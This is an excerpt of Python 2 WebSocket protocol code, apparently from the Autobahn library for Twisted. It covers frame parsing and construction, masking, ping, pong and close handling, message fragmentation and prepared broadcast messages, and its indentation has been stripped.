##
self.processHandshake()
## we failed the connection .. don't process any more data!
##
elif self.state == WebSocketProtocol.STATE_CLOSED:
## ignore any data received after WS was closed
##
if self.debugCodePaths:
log.msg("received data in STATE_CLOSED")
## should not arrive here (invalid state)
##
else:
raise Exception("invalid state")
def processHandshake(self):
"""
Process WebSockets handshake.
Modes: Hybi, Hixie
"""
raise Exception("must implement handshake (client or server) in derived class")
def registerProducer(self, producer, streaming):
"""
Register a Twisted producer with this protocol.
Modes: Hybi, Hixie
:param producer: A Twisted push or pull producer.
:type producer: object
:param streaming: Producer type.
:type streaming: bool
"""
self.transport.registerProducer(producer, streaming)
def _trigger(self):
"""
Trigger sending stuff from send queue (which is only used for chopped/synched writes).
Modes: Hybi, Hixie
"""
if not self.triggered:
self.triggered = True
self._send()
def _send(self):
"""
      Send out stuff from the send queue. For details on how this works, see test/trickling
in the repo.
Modes: Hybi, Hixie
"""
if len(self.send_queue) > 0:
e = self.send_queue.popleft()
if self.state != WebSocketProtocol.STATE_CLOSED:
self.transport.write(e[0])
if self.logOctets:
self.logTxOctets(e[0], e[1])
else:
if self.debugCodePaths:
log.msg("skipped delayed write, since connection is closed")
# we need to reenter the reactor to make the latter
# reenter the OS network stack, so that octets
# can get on the wire. Note: this is a "heuristic",
# since there is no (easy) way to really force out
# octets from the OS network stack to wire.
reactor.callLater(WebSocketProtocol.QUEUED_WRITE_DELAY, self._send)
else:
self.triggered = False
def sendData(self, data, sync = False, chopsize = None):
"""
      Wrapper for self.transport.write which allows giving a chopsize.
      When asked to chop up writing to the TCP stream, we write only chopsize octets
      and then give up control to select() in the underlying reactor so that bytes
      get onto the wire immediately. Note that this is different from and unrelated
to WebSockets data message fragmentation. Note that this is also different
from the TcpNoDelay option which can be set on the socket.
Modes: Hybi, Hixie
"""
if chopsize and chopsize > 0:
i = 0
n = len(data)
done = False
while not done:
j = i + chopsize
if j >= n:
done = True
j = n
self.send_queue.append((data[i:j], True))
i += chopsize
self._trigger()
else:
if sync or len(self.send_queue) > 0:
self.send_queue.append((data, sync))
self._trigger()
else:
self.transport.write(data)
if self.logOctets:
self.logTxOctets(data, False)
def sendPreparedMessage(self, preparedMsg):
"""
Send a message that was previously prepared with
WebSocketFactory.prepareMessage().
Modes: Hybi, Hixie
"""
if self.websocket_version == 0:
self.sendData(preparedMsg.payloadHixie)
else:
self.sendData(preparedMsg.payloadHybi)
def processData(self):
"""
After WebSockets handshake has been completed, this procedure will do all
subsequent processing of incoming bytes.
Modes: Hybi, Hixie
"""
if self.websocket_version == 0:
return self.processDataHixie76()
else:
return self.processDataHybi()
def processDataHixie76(self):
"""
Hixie-76 incoming data processing.
Modes: Hixie
"""
buffered_len = len(self.data)
## outside a message, that is we are awaiting data which starts a new message
##
if not self.inside_message:
if buffered_len >= 2:
## new message
##
if self.data[0] == '\x00':
self.inside_message = True
if self.utf8validateIncoming:
self.utf8validator.reset()
self.utf8validateIncomingCurrentMessage = True
self.utf8validateLast = (True, True, 0, 0)
else:
self.utf8validateIncomingCurrentMessage = False
self.data = self.data[1:]
self.onMessageBegin(1)
## Hixie close from peer received
##
elif self.data[0] == '\xff' and self.data[1] == '\x00':
self.onCloseFrame()
self.data = self.data[2:]
# stop receiving/processing after having received close!
return False
## malformed data
##
else:
if self.protocolViolation("malformed data received"):
return False
else:
## need more data
return False
end_index = self.data.find('\xff')
if end_index > 0:
payload = self.data[:end_index]
self.data = self.data[end_index + 1:]
else:
payload = self.data
self.data = ''
## incrementally validate UTF-8 payload
##
if self.utf8validateIncomingCurrentMessage:
self.utf8validateLast = self.utf8validator.validate(payload)
if not self.utf8validateLast[0]:
if self.invalidPayload("encountered invalid UTF-8 while processing text message at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageFrameData(payload)
if end_index > 0:
self.inside_message = False
self.onMessageEnd()
return len(self.data) > 0
def processDataHybi(self):
"""
RFC6455/Hybi-Drafts incoming data processing.
Modes: Hybi
"""
buffered_len = len(self.data)
## outside a frame, that is we are awaiting data which starts a new frame
##
if self.current_frame is None:
         ## need a minimum of 2 octets for a new frame
##
if buffered_len >= 2:
## FIN, RSV, OPCODE
##
b = ord(self.data[0])
frame_fin = (b & 0x80) != 0
frame_rsv = (b & 0x70) >> 4
frame_opcode = b & 0x0f
## MASK, PAYLOAD LEN 1
##
b = ord(self.data[1])
frame_masked = (b & 0x80) != 0
frame_payload_len1 = b & 0x7f
## MUST be 0 when no extension defining
## the semantics of RSV has been negotiated
##
if frame_rsv != 0:
if self.protocolViolation("RSV != 0 and no extension negotiated"):
return False
## all client-to-server frames MUST be masked
##
if self.isServer and self.requireMaskedClientFrames and not frame_masked:
if self.protocolViolation("unmasked client-to-server frame"):
return False
## all server-to-client frames MUST NOT be masked
##
if not self.isServer and not self.acceptMaskedServerFrames and frame_masked:
if self.protocolViolation("masked server-to-client frame"):
return False
## check frame
##
if frame_opcode > 7: # control frame (have MSB in opcode set)
## control frames MUST NOT be fragmented
##
if not frame_fin:
if self.protocolViolation("fragmented control frame"):
return False
## control frames MUST have payload 125 octets or less
##
if frame_payload_len1 > 125:
if self.protocolViolation("control frame with payload length > 125 octets"):
return False
## check for reserved control frame opcodes
##
if frame_opcode not in [8, 9, 10]:
if self.protocolViolation("control frame using reserved opcode %d" % frame_opcode):
return False
## close frame : if there is a body, the first two bytes of the body MUST be a 2-byte
## unsigned integer (in network byte order) representing a status code
##
if frame_opcode == 8 and frame_payload_len1 == 1:
if self.protocolViolation("received close control frame with payload len 1"):
return False
else: # data frame
## check for reserved data frame opcodes
##
if frame_opcode not in [0, 1, 2]:
if self.protocolViolation("data frame using reserved opcode %d" % frame_opcode):
return False
## check opcode vs message fragmentation state 1/2
##
if not self.inside_message and frame_opcode == 0:
if self.protocolViolation("received continuation data frame outside fragmented message"):
return False
## check opcode vs message fragmentation state 2/2
##
if self.inside_message and frame_opcode != 0:
if self.protocolViolation("received non-continuation data frame while inside fragmented message"):
return False
## compute complete header length
##
if frame_masked:
mask_len = 4
else:
mask_len = 0
if frame_payload_len1 < 126:
frame_header_len = 2 + mask_len
elif frame_payload_len1 == 126:
frame_header_len = 2 + 2 + mask_len
elif frame_payload_len1 == 127:
frame_header_len = 2 + 8 + mask_len
else:
raise Exception("logic error")
## only proceed when we have enough data buffered for complete
## frame header (which includes extended payload len + mask)
##
if buffered_len >= frame_header_len:
## minimum frame header length (already consumed)
##
i = 2
## extract extended payload length
##
if frame_payload_len1 == 126:
frame_payload_len = struct.unpack("!H", self.data[i:i+2])[0]
if frame_payload_len < 126:
if self.protocolViolation("invalid data frame length (not using minimal length encoding)"):
return False
i += 2
elif frame_payload_len1 == 127:
frame_payload_len = struct.unpack("!Q", self.data[i:i+8])[0]
if frame_payload_len > 0x7FFFFFFFFFFFFFFF: # 2**63
if self.protocolViolation("invalid data frame length (>2^63)"):
return False
if frame_payload_len < 65536:
if self.protocolViolation("invalid data frame length (not using minimal length encoding)"):
return False
i += 8
else:
frame_payload_len = frame_payload_len1
## when payload is masked, extract frame mask
##
frame_mask = None
if frame_masked:
frame_mask = self.data[i:i+4]
i += 4
if frame_masked and frame_payload_len > 0 and self.applyMask:
if frame_payload_len < WebSocketProtocol.PAYLOAD_LEN_XOR_BREAKEVEN:
self.current_frame_masker = XorMaskerSimple(frame_mask)
else:
self.current_frame_masker = XorMaskerShifted1(frame_mask)
else:
self.current_frame_masker = XorMaskerNull()
## remember rest (payload of current frame after header and everything thereafter)
##
self.data = self.data[i:]
## ok, got complete frame header
##
self.current_frame = FrameHeader(frame_opcode,
frame_fin,
frame_rsv,
frame_payload_len,
frame_mask)
## process begin on new frame
##
self.onFrameBegin()
               ## reprocess when frame has no payload or there is buffered data left
##
return frame_payload_len == 0 or len(self.data) > 0
else:
return False # need more data
else:
return False # need more data
## inside a started frame
##
else:
## cut out rest of frame payload
##
rest = self.current_frame.length - self.current_frame_masker.pointer()
if buffered_len >= rest:
data = self.data[:rest]
length = rest
self.data = self.data[rest:]
else:
data = self.data
length = buffered_len
self.data = ""
if length > 0:
## unmask payload
##
payload = self.current_frame_masker.process(data)
## process frame data
##
fr = self.onFrameData(payload)
if fr == False:
return False
## fire frame end handler when frame payload is complete
##
if self.current_frame_masker.pointer() == self.current_frame.length:
fr = self.onFrameEnd()
if fr == False:
return False
## reprocess when no error occurred and buffered data left
##
return len(self.data) > 0
def onFrameBegin(self):
"""
Begin of receive new frame.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
self.control_frame_data = []
else:
## new message started
##
if not self.inside_message:
self.inside_message = True
if self.current_frame.opcode == WebSocketProtocol.MESSAGE_TYPE_TEXT and self.utf8validateIncoming:
self.utf8validator.reset()
self.utf8validateIncomingCurrentMessage = True
self.utf8validateLast = (True, True, 0, 0)
else:
self.utf8validateIncomingCurrentMessage = False
self.onMessageBegin(self.current_frame.opcode)
self.onMessageFrameBegin(self.current_frame.length, self.current_frame.rsv)
def onFrameData(self, payload):
"""
New data received within frame.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
self.control_frame_data.append(payload)
else:
## incrementally validate UTF-8 payload
##
if self.utf8validateIncomingCurrentMessage:
self.utf8validateLast = self.utf8validator.validate(payload)
if not self.utf8validateLast[0]:
if self.invalidPayload("encountered invalid UTF-8 while processing text message at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageFrameData(payload)
def onFrameEnd(self):
"""
End of frame received.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
if self.logFrames:
self.logRxFrame(self.current_frame, self.control_frame_data)
self.processControlFrame()
else:
if self.logFrames:
self.logRxFrame(self.current_frame, self.frame_data)
self.onMessageFrameEnd()
if self.current_frame.fin:
if self.utf8validateIncomingCurrentMessage:
if not self.utf8validateLast[1]:
if self.invalidPayload("UTF-8 text message payload ended within Unicode code point at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageEnd()
self.inside_message = False
self.current_frame = None
def processControlFrame(self):
"""
Process a completely received control frame.
Modes: Hybi
"""
payload = ''.join(self.control_frame_data)
self.control_frame_data = None
## CLOSE frame
##
if self.current_frame.opcode == 8:
code = None
reasonRaw = None
ll = len(payload)
if ll > 1:
code = struct.unpack("!H", payload[0:2])[0]
if ll > 2:
reasonRaw = payload[2:]
if self.onCloseFrame(code, reasonRaw):
return False
## PING frame
##
elif self.current_frame.opcode == 9:
self.onPing(payload)
## PONG frame
##
elif self.current_frame.opcode == 10:
self.onPong(payload)
else:
## we might arrive here, when protocolViolation
## wants us to continue anyway
pass
return True
def sendFrame(self, opcode, payload = "", fin = True, rsv = 0, mask = None, payload_len = None, chopsize = None, sync = False):
"""
Send out frame. Normally only used internally via sendMessage(), sendPing(), sendPong() and sendClose().
      This method deliberately allows sending invalid frames (that is, frames invalid
      per se, or frames invalid because of protocol state). Other than in fuzzing servers,
      calling methods will ensure that no invalid frames are sent.
      In addition, this method supports explicit specification of payload length.
      When payload_len is given, it will always write that many octets to the stream.
      It'll wrap within the payload, resending parts of it when more octets were requested.
      The use case is again fuzzing servers which want to send increasing amounts
      of payload data to peers without having to construct potentially large messages
      themselves.
Modes: Hybi
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if payload_len is not None:
if len(payload) < 1:
raise Exception("cannot construct repeated payload with length %d from payload of length %d" % (payload_len, len(payload)))
l = payload_len
pl = ''.join([payload for k in range(payload_len / len(payload))]) + payload[:payload_len % len(payload)]
else:
l = len(payload)
pl = payload
## first byte
##
b0 = 0
if fin:
b0 |= (1 << 7)
b0 |= (rsv % 8) << 4
b0 |= opcode % 128
## second byte, payload len bytes and mask
##
b1 = 0
if mask or (not self.isServer and self.maskClientFrames) or (self.isServer and self.maskServerFrames):
b1 |= 1 << 7
if not mask:
mask = struct.pack("!I", random.getrandbits(32))
mv = mask
else:
mv = ""
## mask frame payload
##
if l > 0 and self.applyMask:
if l < WebSocketProtocol.PAYLOAD_LEN_XOR_BREAKEVEN:
masker = XorMaskerSimple(mask)
else:
masker = XorMaskerShifted1(mask)
plm = masker.process(pl)
else:
plm = pl
else:
mv = ""
plm = pl
el = ""
if l <= 125:
b1 |= l
elif l <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", l)
elif l <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", l)
else:
raise Exception("invalid payload length")
raw = ''.join([chr(b0), chr(b1), el, mv, plm])
if self.logFrames:
frameHeader = FrameHeader(opcode, fin, rsv, l, mask)
self.logTxFrame(frameHeader, payload, payload_len, chopsize, sync)
## send frame octets
##
self.sendData(raw, sync, chopsize)
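      ## Wire layout sketch of the frame assembled above (added for illustration):
      ##
      ##   b0 : FIN (1 bit) | RSV (3 bits) | opcode (4 bits)
      ##   b1 : MASK (1 bit) | payload length (7 bits; values 126/127 select the
      ##        16/64 bit extended length field el)
      ##   el : optional extended payload length (2 or 8 octets, network byte order)
      ##   mv : optional 4 octet frame mask
      ##   plm: payload, XOR-masked when a mask is present and applyMask is set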
def sendPing(self, payload = None):
"""
      Send out a Ping to the peer. A peer is expected to Pong back the payload as soon
as "practical". When more than 1 Ping is outstanding at a peer, the peer may
elect to respond only to the last Ping.
Modes: Hybi
:param payload: An optional, arbitrary payload of length < 126 octets.
:type payload: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if payload:
l = len(payload)
if l > 125:
raise Exception("invalid payload for PING (payload length must be <= 125, was %d)" % l)
self.sendFrame(opcode = 9, payload = payload)
else:
self.sendFrame(opcode = 9)
def sendPong(self, payload = None):
"""
Send out Pong to peer. A Pong frame MAY be sent unsolicited.
This serves as a unidirectional heartbeat. A response to an unsolicited pong is "not expected".
Modes: Hybi
:param payload: An optional, arbitrary payload of length < 126 octets.
:type payload: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if payload:
l = len(payload)
if l > 125:
raise Exception("invalid payload for PONG (payload length must be <= 125, was %d)" % l)
self.sendFrame(opcode = 10, payload = payload)
else:
self.sendFrame(opcode = 10)
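      ## Keepalive sketch (illustrative, belongs in application code or a subclass):
      ## a protocol may ping its peer periodically, e.g. starting from onOpen(); the
      ## peer's default onPing() implementation will answer each Ping with a Pong.
      ##
      ##   def onOpen(self):
      ##      def heartbeat():
      ##         if self.state == WebSocketProtocol.STATE_OPEN:
      ##            self.sendPing()
      ##            reactor.callLater(10, heartbeat)
      ##      heartbeat()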
def sendCloseFrame(self, code = None, reasonUtf8 = None, isReply = False):
"""
      Send a close frame and update protocol state. Note that this is
      an internal method which deliberately allows sending a close
      frame with an invalid payload.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
- For Hixie mode, code and reasonUtf8 will be silently ignored.
"""
if self.state == WebSocketProtocol.STATE_CLOSING:
if self.debugCodePaths:
log.msg("ignoring sendCloseFrame since connection is closing")
elif self.state == WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("ignoring sendCloseFrame since connection already closed")
elif self.state == WebSocketProtocol.STATE_CONNECTING:
raise Exception("cannot close a connection not yet connected")
elif self.state == WebSocketProtocol.STATE_OPEN:
if self.websocket_version == 0:
self.sendData("\xff\x00")
else:
## construct Hybi close frame payload and send frame
payload = ""
if code is not None:
payload += struct.pack("!H", code)
if reasonUtf8 is not None:
payload += reasonUtf8
self.sendFrame(opcode = 8, payload = payload)
## update state
self.state = WebSocketProtocol.STATE_CLOSING
self.closedByMe = not isReply
## remember payload of close frame we sent
self.localCloseCode = code
self.localCloseReason = reasonUtf8
## drop connection when timeout on receiving close handshake reply
if self.closedByMe:
reactor.callLater(self.closeHandshakeTimeout, self.onCloseHandshakeTimeout)
else:
raise Exception("logic error")
def sendClose(self, code = None, reason = None):
"""
Starts a closing handshake.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, code and reason will be silently ignored.
:param code: An optional close status code (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_NORMAL or 3000-4999).
:type code: int
:param reason: An optional close reason (a string; when present, a status code MUST also be given).
:type reason: str
"""
if code is not None:
if type(code) != int:
raise Exception("invalid type %s for close code" % type(code))
if code != 1000 and not (code >= 3000 and code <= 4999):
raise Exception("invalid close code %d" % code)
if reason is not None:
if code is None:
raise Exception("close reason without close code")
if type(reason) not in [str, unicode]:
raise Exception("invalid type %s for close reason" % type(reason))
reasonUtf8 = reason.encode("UTF-8")
if len(reasonUtf8) + 2 > 125:
raise Exception("close reason too long (%d)" % len(reasonUtf8))
else:
reasonUtf8 = None
self.sendCloseFrame(code = code, reasonUtf8 = reasonUtf8, isReply = False)
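# Illustrative sketch (added by the editor, not in the original source): how the
# checks above play out when initiating a closing handshake from application code.
#
#   self.sendClose()                                   # close without status code
#   self.sendClose(code = 1000)                        # normal closure
#   self.sendClose(code = 4000, reason = u"going away") # application-defined code
#   self.sendClose(reason = "nope")                    # raises: reason without code
#   self.sendClose(code = 2999)                        # raises: code outside 1000 / 3000-4999
#   # the reason is UTF-8 encoded; together with the 2 code octets it must fit in 125 bytes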
def beginMessage(self, opcode = MESSAGE_TYPE_TEXT):
"""
Begin sending new message.
Modes: Hybi, Hixie
:param opcode: Message type, normally either WebSocketProtocol.MESSAGE_TYPE_TEXT (default) or
WebSocketProtocol.MESSAGE_TYPE_BINARY (only Hybi mode).
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state != WebSocketProtocol.SEND_STATE_GROUND:
raise Exception("WebSocketProtocol.beginMessage invalid in current sending state")
if self.websocket_version == 0:
if opcode != 1:
raise Exception("cannot send non-text message in Hixie mode")
self.sendData('\x00')
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
else:
if opcode not in [1, 2]:
raise Exception("use of reserved opcode %d" % opcode)
## remember opcode for later (when sending first frame)
##
self.send_message_opcode = opcode
self.send_state = WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN
def beginMessageFrame(self, length, reserved = 0, mask = None):
"""
Begin sending new message frame.
Modes: Hybi
:param length: Length of frame which is started. Must be >= 0 and <= 2^63.
:type length: int
:param reserved: Reserved bits for frame (an integer from 0 to 7). Note that reserved != 0 is only legal when an extension has been negotiated which defines semantics.
:type reserved: int
:param mask: Optional frame mask. When given, this is used. When None and the peer is a client, a mask will be internally generated. For servers None is default.
:type mask: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state not in [WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN, WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE]:
raise Exception("WebSocketProtocol.beginMessageFrame invalid in current sending state")
if (not type(length) in [int, long]) or length < 0 or length > 0x7FFFFFFFFFFFFFFF: # 2**63
raise Exception("invalid value for message frame length")
if type(reserved) is not int or reserved < 0 or reserved > 7:
raise Exception("invalid value for reserved bits")
self.send_message_frame_length = length
if mask:
## explicit mask given
##
assert type(mask) == str
assert len(mask) == 4
self.send_message_frame_mask = mask
elif (not self.isServer and self.maskClientFrames) or (self.isServer and self.maskServerFrames):
## automatic mask:
## - client-to-server masking (if not deactivated)
## - server-to-client masking (if activated)
##
self.send_message_frame_mask = struct.pack("!I", random.getrandbits(32))
else:
## no mask
##
self.send_message_frame_mask = None
## payload masker
##
if self.send_message_frame_mask and length > 0 and self.applyMask:
if length < WebSocketProtocol.PAYLOAD_LEN_XOR_BREAKEVEN:
self.send_message_frame_masker = XorMaskerSimple(self.send_message_frame_mask)
else:
self.send_message_frame_masker = XorMaskerShifted1(self.send_message_frame_mask)
else:
self.send_message_frame_masker = XorMaskerNull()
## first byte
##
b0 = (reserved % 8) << 4 # FIN = false .. since with streaming, we don't know when message ends
if self.send_state == WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN:
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
b0 |= self.send_message_opcode % 128
else:
pass # message continuation frame
## second byte, payload len bytes and mask
##
b1 = 0
if self.send_message_frame_mask:
b1 |= 1 << 7
mv = self.send_message_frame_mask
else:
mv = ""
el = ""
if length <= 125:
b1 |= length
elif length <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", length)
elif length <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", length)
else:
raise Exception("invalid payload length")
## write message frame header
##
header = ''.join([chr(b0), chr(b1), el, mv])
self.sendData(header)
## now we are inside message frame ..
##
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE_FRAME
def sendMessageFrameData(self, payload, sync = False):
"""
Send out data when within message frame (message was begun, frame was begun).
Note that the frame is automatically ended when enough data has been sent;
that is, there is no endMessageFrame(), since you began the frame specifying
the frame length, which implicitly defines the frame end. This is different from
messages, which you begin and end explicitly, since a message can contain an unlimited
number of frames.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
:param payload: Data to send.
:returns: int -- Hybi mode: when frame still incomplete, returns outstanding octets, when frame complete, returns <= 0, when < 0, the amount of unconsumed data in payload argument. Hixie mode: returns None.
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
## Hixie Mode
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE:
raise Exception("WebSocketProtocol.sendMessageFrameData invalid in current sending state")
self.sendData(payload, sync = sync)
return None
else:
## Hybi Mode
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE_FRAME:
raise Exception("WebSocketProtocol.sendMessageFrameData invalid in current sending state")
rl = len(payload)
if self.send_message_frame_masker.pointer() + rl > self.send_message_frame_length:
l = self.send_message_frame_length - self.send_message_frame_masker.pointer()
rest = -(rl - l)
pl = payload[:l]
else:
l = rl
rest = self.send_message_frame_length - self.send_message_frame_masker.pointer() - l
pl = payload
## mask frame payload
##
plm = self.send_message_frame_masker.process(pl)
## send frame payload
##
self.sendData(plm, sync = sync)
## if we are done with frame, move back into "inside message" state
##
if self.send_message_frame_masker.pointer() >= self.send_message_frame_length:
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
## when == 0 : frame was completed exactly
## when > 0  : frame is still incomplete and that many octets are still needed to complete the frame
## when < 0  : frame was completed and that many octets of the payload argument were left unconsumed
##
return rest
def endMessage(self):
"""
End a previously begun message. No more frames may be sent (for that message). You have to
begin a new message before sending again.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE:
raise Exception("WebSocketProtocol.endMessage invalid in current sending state [%d]" % self.send_state)
if self.websocket_version == 0:
self.sendData('\x00')
else:
self.sendFrame(opcode = 0, fin = True)
self.send_state = WebSocketProtocol.SEND_STATE_GROUND
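# Illustrative sketch (added by the editor, not in the original source): streaming
# a large payload with the frame-based API above (Hybi mode only). The frame length
# is declared up front, so the frame ends implicitly once that many octets were sent;
# produce_chunks() is a hypothetical data source.
#
#   self.beginMessage(opcode = WebSocketProtocol.MESSAGE_TYPE_BINARY)
#   self.beginMessageFrame(length = 3 * 65536)
#   for chunk in produce_chunks(65536):
#       rest = self.sendMessageFrameData(chunk)
#       # rest > 0: frame still incomplete, rest == 0: frame complete,
#       # rest < 0: frame complete with -rest unconsumed octets in chunk
#   self.endMessage()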
def sendMessageFrame(self, payload, reserved = 0, mask = None, sync = False):
"""
When a message has begun, send a complete message frame in one go.
Modes: Hybi
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
self.beginMessageFrame(len(payload), reserved, mask)
self.sendMessageFrameData(payload, sync)
def sendMessage(self, payload, binary = False, payload_frag_size = None, sync = False):
"""
Send out a message in one go.
You can send a text or binary message, and optionally specify a payload fragment size.
When the latter is given, the payload will be split up into frames with
payload <= the payload_frag_size given.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
if binary:
raise Exception("cannot send binary message in Hixie76 mode")
if payload_frag_size:
raise Exception("cannot fragment messages in Hixie76 mode")
self.sendMessageHixie76(payload, sync)
else:
self.sendMessageHybi(payload, binary, payload_frag_size, sync)
def sendMessageHixie76(self, payload, sync = False):
"""
Hixie76-Variant of sendMessage().
Modes: Hixie
"""
self.sendData('\x00' + payload + '\xff', sync = sync)
def sendMessageHybi(self, payload, binary = False, payload_frag_size = None, sync = False):
"""
Hybi-Variant of sendMessage().
Modes: Hybi
"""
## (initial) frame opcode
##
if binary:
opcode = 2
else:
opcode = 1
## an explicit payload_frag_size argument overrides the autoFragmentSize setting
##
if payload_frag_size is not None:
pfs = payload_frag_size
else:
if self.autoFragmentSize > 0:
pfs = self.autoFragmentSize
else:
pfs = None
## send unfragmented
##
if pfs is None or len(payload) <= pfs:
self.sendFrame(opcode = opcode, payload = payload, sync = sync)
## send data message in fragments
##
else:
if pfs < 1:
raise Exception("payload fragment size must be at least 1 (was %d)" % pfs)
n = len(payload)
i = 0
done = False
first = True
while not done:
j = i + pfs
if j > n:
done = True
j = n
if first:
self.sendFrame(opcode = opcode, payload = payload[i:j], fin = done, sync = sync)
first = False
else:
self.sendFrame(opcode = 0, payload = payload[i:j], fin = done, sync = sync)
i += pfs
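# Worked example (added by the editor for clarity, not in the original source):
# with len(payload) == 10 and pfs == 4 the loop above emits three frames:
#   payload[0:4]  -> opcode 1/2, fin = False   (first frame carries the message opcode)
#   payload[4:8]  -> opcode 0,   fin = False   (continuation frame)
#   payload[8:10] -> opcode 0,   fin = True    (last continuation frame, j clamped to n)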
class PreparedMessage:
"""
Encapsulates a prepared message to be sent later once or multiple
times. This is used for optimizing Broadcast/PubSub.
The message serialization formats currently created internally are:
* Hybi
* Hixie
The construction of different formats is needed, since we support
mixed clients (speaking different protocol versions).
It will also be the place to add a 3rd format, when we support
the deflate extension, since then, the clients will be mixed
between Hybi-Deflate-Unsupported, Hybi-Deflate-Supported and Hixie.
"""
def __init__(self, payload, binary, masked):
self.initHixie(payload, binary)
self.initHybi(payload, binary, masked)
def initHixie(self, payload, binary):
if binary:
# binary payloads cannot be framed in Hixie-76 mode, so silently
# drop them here (an alternative would be to base64-encode the payload)
self.payloadHixie = ''
else:
self.payloadHixie = '\x00' + payload + '\xff'
def initHybi(self, payload, binary, masked):
l = len(payload)
## first byte
##
b0 = ((1 << 7) | 2) if binary else ((1 << 7) | 1)
## second byte, payload len bytes and mask
##
if masked:
b1 = 1 << 7
mask = struct.pack("!I", random.getrandbits(32))
if l == 0:
plm = payload
elif l < WebSocketProtocol.PAYLOAD_LEN_XOR_BREAKEVEN:
plm = XorMaskerSimple(mask).process(payload)
else:
plm = XorMaskerShifted1(mask).process(payload)
else:
b1 = 0
mask = ""
plm = payload
## payload extended length
##
el = ""
if l <= 125:
b1 |= l
elif l <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", l)
elif l <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", l)
else:
raise Exception("invalid payload length")
## raw WS message (single frame)
##
self.payloadHybi = ''.join([chr(b0), chr(b1), el, mask, plm])
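# Worked example (added by the editor for clarity, not in the original source):
# for an unmasked text message "Hi" the serialization above yields
#   b0 = (1 << 7) | 1 = 0x81      (FIN set, opcode 1 = text)
#   b1 = 0x02                     (no mask bit, payload length 2)
#   el = "" and mask = ""         (length <= 125, unmasked)
#   payloadHybi = "\x81\x02Hi"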
class WebSocketFactory:
"""
Mixin for WebSocketClientFactory and WebSocketServerFactory.
"""
def prepareMessage(self, payload, binary = False, masked = None):
"""
Prepare a WebSocket message. This can be later used on multiple
instances of WebSocketProtocol using sendPreparedMessage().
By doing so, you can avoid the (small) overhead of framing the
_same_ payload into WS messages when that payload is to be sent
out on multiple connections.
Modes: Hybi, Hixie
Caveats:
1) Only use when you know what you are doing, e.g. calling
sendPreparedMessage() on the _same_ protocol instance multiple
times with the same prepared message might break the spec,
since e.g. the frame mask will be the same!
2) Treat the object returned as opaque. It may change!
"""
if masked is None:
masked = not self.isServer
return PreparedMessage(payload, binary, masked)
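# Illustrative sketch (added by the editor, not in the original source): using
# prepareMessage() for broadcast. It assumes the factory tracks connected protocol
# instances in a hypothetical self.clients set and that each protocol exposes the
# sendPreparedMessage() method referred to in the docstring above.
#
#   def broadcast(self, payload):
#       msg = self.prepareMessage(payload)       # framed once ...
#       for client in self.clients:
#           client.sendPreparedMessage(msg)      # ... sent many times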
class WebSocketServerProtocol(WebSocketProtocol):
"""
A Twisted protocol for WebSockets servers.
"""
def onConnect(self, connectionRequest):
"""
Callback fired during WebSocket opening handshake when new WebSocket client
connection is about to be established.
Throw HttpException when you don't want to accept the WebSocket
connection request. For example, throw a
HttpException(httpstatus.HTTP_STATUS_CODE_UNAUTHORIZED[0], "You are not authorized for this!").
When you want to accept the connection, return the accepted protocol
from list of WebSockets (sub)protocols provided by client or None to
speak no specific one or when the client list was empty.
:param connectionRequest: WebSocket connection request information.
:type connectionRequest: instance of :class:`autobahn.websocket.ConnectionRequest`
"""
return None
def connectionMade(self):
"""
Called by Twisted when new TCP connection from client was accepted. Default
implementation will prepare for initial WebSocket opening handshake.
When overriding in derived class, make sure to call this base class
implementation _before_ your code.
"""
self.isServer = True
WebSocketProtocol.connectionMade(self)
self.factory.countConnections += 1
if self.debug:
log.msg("connection accepted from peer %s" % self.peerstr)
def connectionLost(self, reason):
"""
Called by Twisted when established TCP connection from client was lost. Default
implementation will tear down all state properly.
When overriding in derived class, make sure to call this base class
implementation _after_ your code.
"""
WebSocketProtocol.connectionLost(self, reason)
self.factory.countConnections -= 1
